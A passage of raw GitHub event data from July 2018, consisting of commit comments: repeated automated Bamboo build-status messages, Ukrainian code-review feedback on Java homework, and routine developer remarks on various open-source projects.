test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:38:13Z"}
{"id":"7945653430","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661314,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-10T18:38:33Z","updated_at":"2018-07-10T18:38:33Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-10T18:38:33Z"}
{"id":"7945657869","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661318,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-10T18:39:24Z","updated_at":"2018-07-10T18:39:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:39:24Z"}
{"id":"7945659386","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661321,"position":19,"line":19,"path":"HomeWork4/HW4Task1/test/com/TestMinMax.java","commit_id":"acbf3dec961662a08ef479a072db4f44a78016d0","created_at":"2018-07-10T18:39:42Z","updated_at":"2018-07-10T18:39:42Z","author_association":"OWNER","body":"ще добре було б перевірити, що буде, якщо введемо два однакових числа або всі однакові"}},"created_at":"2018-07-10T18:39:42Z"}
{"id":"7945661500","type":"CommitCommentEvent","actor":{"login":"jduss4"},"repo":{"name":"CDRH/data"},"payload":{"comment":{"id":29661326,"position":15,"line":179,"path":"config/api_schema.yml","commit_id":"c215bac7f84ba82dcc68a09a1e9d65dfef31b7e1","created_at":"2018-07-10T18:40:06Z","updated_at":"2018-07-10T18:40:06Z","author_association":"MEMBER","body":"apparently I decided not to finish that sentence"}},"created_at":"2018-07-10T18:40:06Z"}
{"id":"7945662619","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661328,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-10T18:40:19Z","updated_at":"2018-07-10T18:40:19Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-10T18:40:19Z"}
{"id":"7945662727","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29661329,"position":4,"line":46,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"23d1d7431a427f879f1d42c7057422866e70f207","created_at":"2018-07-10T18:40:20Z","updated_at":"2018-07-10T18:40:20Z","author_association":"CONTRIBUTOR","body":"Formerly the function 'create_ghost'!"}},"created_at":"2018-07-10T18:40:20Z"}
{"id":"7945663488","type":"CommitCommentEvent","actor":{"login":"jgarciagimenez"},"repo":{"name":"josecamachop/FCParser"},"payload":{"comment":{"id":29661331,"position":null,"line":null,"path":null,"commit_id":"9539a285f1ce4d1a2f7f9c9ad75473d8e794f021","created_at":"2018-07-10T18:40:29Z","updated_at":"2018-07-10T18:40:29Z","author_association":"COLLABORATOR","body":"The group specification in the regular expression ( (?P<match>)) is not necessary at the moment. But will be needed for future functionalities."}},"created_at":"2018-07-10T18:40:29Z"}
{"id":"7945664150","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661334,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-10T18:40:37Z","updated_at":"2018-07-10T18:40:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:40:37Z"}
{"id":"7945664720","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661335,"position":18,"line":18,"path":"HomeWork4/HW4Task1/test/com/TestRange.java","commit_id":"acbf3dec961662a08ef479a072db4f44a78016d0","created_at":"2018-07-10T18:40:43Z","updated_at":"2018-07-10T18:40:43Z","author_association":"OWNER","body":"варто перевірити і для чисел, які не входять в заданий діапазон\r\nАле загалом дуже добре, молодець"}},"created_at":"2018-07-10T18:40:43Z"}
{"id":"7945669363","type":"CommitCommentEvent","actor":{"login":"jduss4"},"repo":{"name":"CDRH/data"},"payload":{"comment":{"id":29661344,"position":15,"line":179,"path":"config/api_schema.yml","commit_id":"c215bac7f84ba82dcc68a09a1e9d65dfef31b7e1","created_at":"2018-07-10T18:41:38Z","updated_at":"2018-07-10T18:41:38Z","author_association":"MEMBER","body":"I might just not even put an explanation, looking at it again, so I'll drop the \"but\""}},"created_at":"2018-07-10T18:41:38Z"}
{"id":"7945670103","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661346,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-10T18:41:46Z","updated_at":"2018-07-10T18:41:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:41:46Z"}
{"id":"7945671876","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661350,"position":21,"line":38,"path":"HomeWork4/HW4Task2/src/com/Dog.java","commit_id":"a9436ea7e5970cd6e8af88340d983fc6e0923e6b","created_at":"2018-07-10T18:42:08Z","updated_at":"2018-07-10T18:42:08Z","author_association":"OWNER","body":"відразу\r\nreturn this.equals(dog);"}},"created_at":"2018-07-10T18:42:08Z"}
{"id":"7945672005","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661352,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-10T18:42:10Z","updated_at":"2018-07-10T18:42:10Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-10T18:42:10Z"}
{"id":"7945672574","type":"CommitCommentEvent","actor":{"login":"albfan"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29661354,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-10T18:42:16Z","updated_at":"2018-07-10T18:42:16Z","author_association":"COLLABORATOR","body":"Then for this project all the gitlab story is only noise.\r\n\r\nI'm aware you are concerned about licenses and ethics in software, but for the @Izzysoft problem, these days this is (and seems it will be) the repo, there's a specific fix to do and took like 5 sec to solve it.\r\n\r\nI didn't choose to publish this app on F-droid (although I'm glad it is there). If you make that decision you should care about its needs, even more if this requires no time to fix it."}},"created_at":"2018-07-10T18:42:16Z"}
{"id":"7945675409","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661364,"position":43,"line":51,"path":"HomeWork4/HW4Task2/src/com/Dog.java","commit_id":"a9436ea7e5970cd6e8af88340d983fc6e0923e6b","created_at":"2018-07-10T18:42:49Z","updated_at":"2018-07-10T18:42:49Z","author_association":"OWNER","body":"для чого нам цю команда?"}},"created_at":"2018-07-10T18:42:49Z"}
{"id":"7945676092","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661365,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-10T18:42:57Z","updated_at":"2018-07-10T18:42:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:42:57Z"}
{"id":"7945677641","type":"CommitCommentEvent","actor":{"login":"AliBasrah"},"repo":{"name":"AliBasrah/SiltPit"},"payload":{"comment":{"id":29661368,"position":null,"line":null,"path":null,"commit_id":"15d90e29acc5134d53d46e56a43fe7fe8d782015","created_at":"2018-07-10T18:43:14Z","updated_at":"2018-07-10T18:43:14Z","author_association":"OWNER","body":"\tfile \t\t\t\t\t\t\t\t\t\t function\r\n \tlayerscheck.m\t\t\t\t\t\t\t\tCheck ANN and Compare results with MLR\r\n\tNNregression1algorithms.m \t\t\t\t\t1 Hidden Layer  Different ANN structure/Training \r\n\tNNregression2algorithms.m \t\t\t\t\t2 Hidden Layer  Different ANN structure/Training \r\n\tOptimumVariables.m \t\t\t\t\t\tCalculate the Best Width Using ANN\r\n\tSWCD.mat \t\t\t\t\t\t\t\tTraining/Testing/Validation for SWCD\r\n\tSWCU.mat \t\t\t\t\t\t\t\tTraining/Testing/Validation for SWCU\r\n\tTTE.mat \t\t\t\t\t\t\t\t\tTraining/Testing/Validation for TTE\r\n        DWFD.mat \t\t\t\t\t\t\t\tTraining/Testing/Validation for DWFD\r\n\tDWFU.mat \t\t\t\t\t\t\t\tTraining/Testing/Validation for DWFU\r\n"}},"created_at":"2018-07-10T18:43:14Z"}
{"id":"7945681976","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661378,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-10T18:44:09Z","updated_at":"2018-07-10T18:44:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:44:09Z"}
{"id":"7945685363","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661384,"position":19,"line":19,"path":"Homework4/Dog.java","commit_id":"911cd34de231e3d4224df52e6893527c07e21298","created_at":"2018-07-10T18:44:48Z","updated_at":"2018-07-10T18:44:48Z","author_association":"OWNER","body":"тут можна відразу\r\nreturn this.name == d.getName();"}},"created_at":"2018-07-10T18:44:48Z"}
{"id":"7945685777","type":"CommitCommentEvent","actor":{"login":"anil100391"},"repo":{"name":"Neo-The1/ThinkingTicTacToe"},"payload":{"comment":{"id":29661386,"position":29,"line":52,"path":"monteCarlo.py","commit_id":"a74196ad8fbc3dfc63ffd5e689f050f0249c1c83","created_at":"2018-07-10T18:44:53Z","updated_at":"2018-07-10T18:44:53Z","author_association":"COLLABORATOR","body":"missing bracket here :).\r\nit is written like win - loss / total while (win - loss)/total is meant"}},"created_at":"2018-07-10T18:44:53Z"}
{"id":"7945690146","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29661402,"position":null,"line":null,"path":null,"commit_id":"4dc59edd4e8a1412a476c21f4731f80df9b06c2d","created_at":"2018-07-10T18:45:47Z","updated_at":"2018-07-10T18:45:47Z","author_association":"OWNER","body":"It's still a lot of work to make it working. But now I'm watching France vs Belgium"}},"created_at":"2018-07-10T18:45:47Z"}
{"id":"7945692564","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661405,"position":23,"line":23,"path":"Homework4/MainL4Ex1.java","commit_id":"911cd34de231e3d4224df52e6893527c07e21298","created_at":"2018-07-10T18:46:15Z","updated_at":"2018-07-10T18:46:15Z","author_association":"OWNER","body":"можна простіше\r\nm.res = m.a<=5 && m.b<=5 && m.c<=5;"}},"created_at":"2018-07-10T18:46:15Z"}
{"id":"7945696748","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29661414,"position":4,"line":46,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"23d1d7431a427f879f1d42c7057422866e70f207","created_at":"2018-07-10T18:47:07Z","updated_at":"2018-07-10T18:47:07Z","author_association":"MEMBER","body":":ghost: "}},"created_at":"2018-07-10T18:47:07Z"}
{"id":"7945696988","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661415,"position":23,"line":23,"path":"Homework4/MainL4Ex11.java","commit_id":"911cd34de231e3d4224df52e6893527c07e21298","created_at":"2018-07-10T18:47:09Z","updated_at":"2018-07-10T18:47:09Z","author_association":"OWNER","body":"добре було би написати свої функції для визначення мінімуму та максимуму"}},"created_at":"2018-07-10T18:47:09Z"}
{"id":"7945710852","type":"CommitCommentEvent","actor":{"login":"techgique"},"repo":{"name":"CDRH/data"},"payload":{"comment":{"id":29661443,"position":15,"line":179,"path":"config/api_schema.yml","commit_id":"c215bac7f84ba82dcc68a09a1e9d65dfef31b7e1","created_at":"2018-07-10T18:49:57Z","updated_at":"2018-07-10T18:49:57Z","author_association":"MEMBER","body":"I wondered if that would be the case, that \"but\" would just get dropped"}},"created_at":"2018-07-10T18:49:57Z"}
{"id":"7945713074","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661449,"position":19,"line":19,"path":"Homework4/MainL4Ex2.java","commit_id":"911cd34de231e3d4224df52e6893527c07e21298","created_at":"2018-07-10T18:50:23Z","updated_at":"2018-07-10T18:50:23Z","author_association":"OWNER","body":"я не впевнена, що в цьому випадку d3.буде найстаршим\r\nСпробуй протестувати на таких даних\r\nd1.age = 10\r\nd2.age  = 3\r\nd3.age  = 7\r\n"}},"created_at":"2018-07-10T18:50:23Z"}
{"id":"7945714235","type":"CommitCommentEvent","actor":{"login":"rootsnfruits"},"repo":{"name":"rootsnfruits/rootsnfruits.github.io"},"payload":{"comment":{"id":29661453,"position":null,"line":null,"path":null,"commit_id":"0a6a41b42c05d7b68cff5a8a3c196499258df7b3","created_at":"2018-07-10T18:50:36Z","updated_at":"2018-07-10T18:50:36Z","author_association":"OWNER","body":"redirection is not required"}},"created_at":"2018-07-10T18:50:36Z"}
{"id":"7945717893","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"osrf/osrf_testing_tools_cpp"},"payload":{"comment":{"id":29661466,"position":5,"line":61,"path":"CMakeLists.txt","commit_id":"a433bb473c34ddfabf9444c59107662525bd5fe7","created_at":"2018-07-10T18:51:20Z","updated_at":"2018-07-10T18:51:20Z","author_association":"MEMBER","body":"The included file is trying to use the CMake variable [osrf_testing_tools_cpp_DIR](https://github.com/osrf/osrf_testing_tools_cpp/blob/9c5eb3265a99155d4ea5425e62ac6b80befa447b/osrf_testing_tools_cpp/CMakeLists.txt#L20) which is not defined in this case. When invoking CMake with `--warn-uninitialized` this results in the following warning:\r\n\r\n```\r\nCMake Warning (dev) at cmake/osrf_testing_tools_cpp_require_googletest.cmake:158 (set):\r\n  uninitialized variable 'osrf_testing_tools_cpp_DIR'\r\n```\r\n\r\nNot sure what should happen in this case."}},"created_at":"2018-07-10T18:51:20Z"}
{"id":"7945717945","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29661467,"position":31,"line":31,"path":"linker.rkt","commit_id":"b1acfcc573fd663cd6c0c42c4c9da1900c363e6f","created_at":"2018-07-10T18:51:21Z","updated_at":"2018-07-10T18:51:21Z","author_association":"OWNER","body":"Don't use uuid, that's ridiculous. Use make-temporary-file"}},"created_at":"2018-07-10T18:51:21Z"}
{"id":"7945726145","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29661487,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T18:53:01Z","updated_at":"2018-07-10T18:53:01Z","author_association":"CONTRIBUTOR","body":"Thanks for the in-depth explanation, good insight to have."}},"created_at":"2018-07-10T18:53:01Z"}
{"id":"7945734082","type":"CommitCommentEvent","actor":{"login":"hackiftekhar"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":29661504,"position":null,"line":null,"path":null,"commit_id":"9bb0f564c95fd6f015775c289f4d228658c006de","created_at":"2018-07-10T18:54:34Z","updated_at":"2018-07-10T18:54:34Z","author_association":"OWNER","body":"Hreat!"}},"created_at":"2018-07-10T18:54:34Z"}
{"id":"7945734419","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29661505,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T18:54:38Z","updated_at":"2018-07-10T18:54:38Z","author_association":"CONTRIBUTOR","body":"@CharliePoole Oops, I meant `SERIALIZATION`.\r\n\r\nIt indicates\r\n- whether we provide `BinarySerializableConstraint` and `XmlSerializableConstraint`\r\n- whether `public override void GetObjectData(SerializationInfo info, StreamingContext context)` and `protected Exception(SerializationInfo info, StreamingContext context)` exist to be overridden\r\n- whether we compile an internal `System.SerializableAttribute`\r\n- whether `using System.Runtime.Serialization;` can be added without breaking compilation\r\n\r\nI did not remember to document it at https://github.com/nunit/nunit/blob/master/BUILDING.md#defined-constants. I'll try to remember to do that when we change `ASYNC` to `TASK_PARALLEL_LIBRARY_API`. (`TASK_PARALLEL_LIBRARY_API` will mean that we ship APIs which depend on the TPL. We'll have async support in all builds regardless.)\r\n\r\nI remember using #define` inside `#if`, so they must have updated it somewhere along the line. [Sharplab demo](https://sharplab.io/#v2:EYLgHgbALANALiATgVwHYB8DEATApgMwEtVcACAQQFgAoTQ/CmnA4sgISd1W3ppoAEADKX4BGANx9q/AMwjREEQCZ5AdhoBvGqR0i5YxfyjyAHAAoAlNt1ba9Uh2q7n8gJxmARGw8XJtXAA2AM641i5ungByAPYOPn6YXDz4YaQAvjRpQA==)"}},"created_at":"2018-07-10T18:54:38Z"}
{"id":"7945739047","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29661517,"position":null,"line":null,"path":null,"commit_id":"85a2c5189f546af3ab8de4698e06f9f7b21d99aa","created_at":"2018-07-10T18:55:33Z","updated_at":"2018-07-10T18:55:33Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-44](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-44).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-44-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-10T18:55:33Z"}
{"id":"7945745013","type":"CommitCommentEvent","actor":{"login":"MakKeywa"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661524,"position":19,"line":19,"path":"Homework4/MainL4Ex2.java","commit_id":"911cd34de231e3d4224df52e6893527c07e21298","created_at":"2018-07-10T18:56:44Z","updated_at":"2018-07-10T18:56:44Z","author_association":"COLLABORATOR","body":"Dog d1 = new Dog(\"name1\", breed.Bulldog, 10);\r\n\t\tDog d2 = new Dog(\"name2\", breed.Spaniel, 3);\r\n\t\tDog d3 = new Dog(\"name3\", breed.Bulldog, 7);\r\n\r\nOutput:\r\nThere are not two dogs with same name\r\nThe oldest dog's name is name1 and Bulldog."}},"created_at":"2018-07-10T18:56:44Z"}
{"id":"7945745069","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29661525,"position":null,"line":null,"path":null,"commit_id":"24a9578d8d4ea642a33706c93284594c6a8f2877","created_at":"2018-07-10T18:56:45Z","updated_at":"2018-07-10T18:56:45Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/24a9578d8d4ea642a33706c93284594c6a8f2877/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-10T18:56:45Z"}
{"id":"7945751601","type":"CommitCommentEvent","actor":{"login":"fuzzyspittinwords"},"repo":{"name":"tapio/live-server"},"payload":{"comment":{"id":29661535,"position":3,"line":14,"path":"injected.html","commit_id":"90d59a7d226a641843dfdafbf1612d653a20a74c","created_at":"2018-07-10T18:57:59Z","updated_at":"2018-07-10T18:57:59Z","author_association":"NONE","body":"15"}},"created_at":"2018-07-10T18:57:59Z"}
{"id":"7945752741","type":"CommitCommentEvent","actor":{"login":"Marcel-Ng"},"repo":{"name":"Marcel-Ng/first-progressive-web-app-"},"payload":{"comment":{"id":29661539,"position":null,"line":null,"path":null,"commit_id":"53cbae14dbcd2c18acf927099f310ca165ab9e0a","created_at":"2018-07-10T18:58:14Z","updated_at":"2018-07-10T18:58:14Z","author_association":"OWNER","body":"This is a tutorial adopted from google, a help developers make their first web applications. thanks."}},"created_at":"2018-07-10T18:58:14Z"}
{"id":"7945757589","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"Microsoft/vscode-languageserver-node"},"payload":{"comment":{"id":29661548,"position":null,"line":null,"path":null,"commit_id":"7994319e90866970f68fdd828b4dc03da5fdc423","created_at":"2018-07-10T18:59:10Z","updated_at":"2018-07-10T18:59:10Z","author_association":"CONTRIBUTOR","body":"Forgot to push / create the tags for this release? :)"}},"created_at":"2018-07-10T18:59:10Z"}
{"id":"7945758780","type":"CommitCommentEvent","actor":{"login":"kfreezen"},"repo":{"name":"cloudveiltech/Filter-Windows"},"payload":{"comment":{"id":29661554,"position":null,"line":null,"path":null,"commit_id":"dfafb9dd7672e9dea9e29fb37d323049d9df85ba","created_at":"2018-07-10T18:59:24Z","updated_at":"2018-07-10T18:59:24Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Block screen not showing all categories](https://trello.com/c/zmbwsnij/10-block-screen-not-showing-all-categories)"}},"created_at":"2018-07-10T18:59:24Z"}
{"id":"7945759220","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29661556,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T18:59:29Z","updated_at":"2018-07-10T18:59:29Z","author_association":"CONTRIBUTOR","body":"Why do that when relocatable builds are superior in every way? "}},"created_at":"2018-07-10T18:59:29Z"}
{"id":"7945760946","type":"CommitCommentEvent","actor":{"login":"John-Luke"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29661562,"position":4,"line":143,"path":"rpcs3/Emu/Cell/Modules/cellGame.cpp","commit_id":"317698a15bd4a2cf849552d57a71418cd4622ace","created_at":"2018-07-10T18:59:49Z","updated_at":"2018-07-10T18:59:49Z","author_association":"NONE","body":"The previous message said: `TODO: Use the free space of the computer's HDD where RPCS3 is being run.`\r\n\r\nI found the `QStorageInfo` (https://doc.qt.io/qt-5/qstorageinfo.html) class in qt to get free bytes but i'm not a c++ dev and i do not know if it is the rigth way to do this."}},"created_at":"2018-07-10T18:59:49Z"}
